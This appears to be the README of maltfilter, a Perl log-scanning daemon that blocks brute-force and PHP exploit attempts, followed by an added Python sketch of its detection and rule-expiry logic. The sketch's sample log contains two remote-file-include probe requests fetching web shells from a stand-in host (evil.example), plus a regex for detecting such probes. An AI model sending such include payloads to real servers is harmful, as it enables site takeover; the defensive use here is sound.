view README @ 97:3dbd9d392986
Change XSS style attack DroneBL class to 6. Still not exactly what we want, though.
author: Matti Hamalainen <ccr@tnsp.org>
date: Mon, 31 Aug 2009 11:57:46 +0300
parents: b1f9df8bb084
children: 53a076bc75db
Malicious Attack Livid Termination Filter daemon (maltfilter) v0.19.3
=====================================================================
Programmed by Matti 'ccr' Hämäläinen <ccr@tnsp.org>
(C) Copyright 2009 Tecnic Software productions (TNSP)

Distributed under the modified ("3-clause") BSD license.
Please see the included file COPYING for more information.


About
=====
Maltfilter is a daemon script written in Perl, which continuously scans
various system logfiles (auth.log, Apache style common logformat and
error logs, etc.) for signs of malicious connections, break-in attempts
(login bruteforcing, etc.) and exploitation attempts. The originating IP
addresses of these connections can then be acted upon in the following
ways, each being optional:

 * Insertion (and eventual deletion or "weeding") of Netfilter rules.

 * Submitting an entry to the DroneBL DNSBL service.

 * Gathering "evidence" about certain PHP XSS exploit attempts into a
   specified directory. These evidence files include the attempted
   exploit code (if found) and the hosts which have tried to make your
   server run it.

Additionally Maltfilter can generate status reports (either continuously
in daemon mode, or in run-once report mode), in plaintext and HTML
formats.

Requirements:
 - Perl 5.8 or later
 - Date::Parse (libtimedate-perl)
 - Net::IP (libnet-ip-perl)
 - Net::DNS (libnet-dns-perl)
 - LWP::UserAgent (libwww-perl)


Memory requirement considerations
=================================
Because Maltfilter is written in Perl, it (or rather the Perl interpreter
it runs under) tends not to return allocated memory to the operating
system. This is NOT a memory leak per se, but a property of Perl's
memory allocator: freed memory is kept and reused for other structures
when needed, so the VIRT figure rises in steps and does not come back
down. However, there may be some situations (none that I have experienced
myself as of yet, but as usual anything is possible) where Maltfilter's
memory consumption rises to an unbearable level.

On high-volume servers it may be useful to periodically restart the
daemon (a complete restart, not a reload via HUP) to free the memory.
It also helps to set the FILTER_MAX_AGE and GLOBAL_MAX_AGE configuration
settings to smaller values, so that less data is held in memory at once.


Installation
============
Copy the maltfilter script to /usr/sbin and set permissions (these steps
require root):

 $ cp maltfilter /usr/sbin/maltfilter
 $ chmod 755 /usr/sbin/maltfilter
 $ chown root:root /usr/sbin/maltfilter

Copy the example configuration under /etc. You may not want the
configuration to be readable by regular users, so the example below sets
mode 600 on it:

 $ cp example.conf /etc/maltfilter.conf
 $ chmod 600 /etc/maltfilter.conf
 $ chown root:root /etc/maltfilter.conf


Optional
========
Additionally you can set up the provided Debian style init script:

 $ cp example.init /etc/init.d/maltfilter
 $ chmod 755 /etc/init.d/maltfilter
 $ chown root:root /etc/init.d/maltfilter

You need to edit the script if you did not install the configuration and
maltfilter to the paths described in the installation section.

A simple example CSS stylesheet for the HTML reports is also provided
for your convenience.


Configuration and usage
=======================
See example.conf for documentation about the settings.

Start maltfilter either via the init script or from the command line:

 $ maltfilter /var/run/maltfilter.pid /etc/maltfilter.conf

If you want to use the init script, you need to edit your init runlevel
settings to enable it; for example, on Debian/Ubuntu you can use
rcconf(8) or chkconfig(8).


Reports
=======
Automatic report generation can be enabled in the configuration. You can
also run "full" report generation via the "-f" option; in this special
mode no automatic weeding is performed, resulting in more data being
shown.
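The detection and weeding behaviour the About and memory sections describe, as an added example in Python. This is not maltfilter's own code (maltfilter is Perl, and its actual patterns, thresholds and whitelist handling live in the script and example.conf); the regular expressions, the per-kind thresholds, the ten-minute window, the LOCAL_NETS whitelist and the `filter_max_age` name (used here in the role of FILTER_MAX_AGE) are all assumptions, and the sample log lines are constructed from documentation IP ranges. It parses auth.log and Apache common-log lines, counts hits per source IP in a sliding window, emits the Netfilter rule a daemon would insert, records the URL of each PHP remote-include probe as "evidence", and expires both rules and per-IP history after a maximum age, which is the part that keeps the in-memory state from growing without bound.

```python
"""Detection and weeding in the spirit of the maltfilter README: count
offending log events per source IP, emit netfilter rules, gather
evidence URLs, and expire old state.  Added example, not maltfilter's
code; the patterns, thresholds and field names below are assumptions."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# auth.log lines carry no year, so the caller supplies one (assumption).
SSHD_FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?\S+ from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+")
# Apache common log format: ip ident user [ts] "request" status bytes
APACHE_CLF = re.compile(
    r'^(?P<ip>\d+\.\d+\.\d+\.\d+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \d{3} \S+')
# A query parameter whose value is a full URL: the classic PHP remote-include probe.
RFI_PROBE = re.compile(r"[?&]\w+=(https?://[^\s&\"]+)", re.IGNORECASE)

# Never filter our own networks (assumption; a whitelist is normally config-driven).
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Hits inside the window needed before an IP is filtered, per event kind (assumption).
THRESHOLDS = {"ssh-bruteforce": 5, "php-rfi": 1}


def parse_event(line, year=2009):
    """Return (timestamp, ip, kind, evidence_url_or_None), or None if uninteresting."""
    m = SSHD_FAILED.match(line)
    if m:
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        return ts, m["ip"], "ssh-bruteforce", None
    m = APACHE_CLF.match(line)
    if m:
        probe = RFI_PROBE.search(m["req"])
        if probe:
            # Both logs are assumed to be in host local time; drop the offset so the
            # two timestamp kinds stay comparable.
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
            return ts, m["ip"], "php-rfi", probe.group(1)
    return None


class Tracker:
    """Per-IP event history, inserted rules and evidence, with age-based weeding."""

    def __init__(self, window=timedelta(minutes=10), filter_max_age=timedelta(hours=24)):
        self.window = window                  # sliding window for counting hits
        self.filter_max_age = filter_max_age  # how long a rule (and history) is kept
        self.events = defaultdict(list)       # ip -> [timestamps]
        self.filtered = {}                    # ip -> time the rule was inserted
        self.evidence = defaultdict(set)      # exploit URL -> {ips that tried it}

    def feed(self, ts, ip, kind, url=None):
        """Record one event; return the iptables command to run if ip should be filtered."""
        if any(ipaddress.ip_address(ip) in net for net in LOCAL_NETS):
            return None
        if url:
            self.evidence[url].add(ip)
        hist = [t for t in self.events[ip] if t >= ts - self.window] + [ts]
        self.events[ip] = hist
        if len(hist) >= THRESHOLDS[kind] and ip not in self.filtered:
            self.filtered[ip] = ts
            return f"iptables -I INPUT -s {ip} -j DROP  # {kind}, {len(hist)} hit(s)"
        return None

    def weed(self, now):
        """Drop rules and history older than filter_max_age; return the delete commands."""
        cmds = []
        for ip, since in list(self.filtered.items()):
            if now - since > self.filter_max_age:
                del self.filtered[ip]
                cmds.append(f"iptables -D INPUT -s {ip} -j DROP")
        for ip in list(self.events):
            self.events[ip] = [t for t in self.events[ip] if now - t <= self.filter_max_age]
            if not self.events[ip]:
                del self.events[ip]   # this is what actually shrinks the in-memory state
        return cmds


def scan(lines, tracker=None, year=2009):
    """Feed every parseable line to the tracker; return (tracker, insert commands)."""
    tracker = tracker or Tracker()
    actions = []
    for line in lines:
        ev = parse_event(line, year)
        if ev is not None:
            cmd = tracker.feed(*ev)
            if cmd:
                actions.append(cmd)
    return tracker, actions


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
Aug 31 11:50:01 web sshd[2231]: Failed password for root from 203.0.113.7 port 50122 ssh2
Aug 31 11:50:03 web sshd[2233]: Failed password for invalid user admin from 203.0.113.7 port 50130 ssh2
Aug 31 11:50:04 web sshd[2235]: Failed password for root from 203.0.113.7 port 50131 ssh2
Aug 31 11:50:06 web sshd[2237]: Failed password for root from 203.0.113.7 port 50140 ssh2
Aug 31 11:50:09 web sshd[2239]: Failed password for root from 203.0.113.7 port 50144 ssh2
Aug 31 11:51:00 web sshd[2241]: Failed password for root from 192.168.1.20 port 40000 ssh2
198.51.100.9 - - [31/Aug/2009:11:52:10 +0300] "GET /index.php?page=http://evil.example/c99.txt? HTTP/1.1" 200 512
198.51.100.9 - - [31/Aug/2009:11:52:11 +0300] "GET /admin.php?inc=http://evil.example/r57.txt HTTP/1.1" 404 210
"""

if __name__ == "__main__":
    tracker, actions = scan(SAMPLE_LOG.splitlines())
    print("\n".join(actions))
    # a day and a bit later the rules and the per-IP history are weeded
    print("\n".join(tracker.weed(datetime(2009, 9, 2, 12, 0))))
```

Run stand-alone, the block prints one insert rule for the SSH bruteforcer (on its fifth failure inside the window), one for the remote-include prober (a single probe is enough), nothing for the 192.168.1.20 host, and then the two matching delete rules once the weeding time has passed. A real daemon would execute the commands rather than print them, read the logs continuously, and would have to survive the rules it inserted disappearing out from under it (a reboot, a firewall reload), which is what the eventual "weeding" pass described above reconciles.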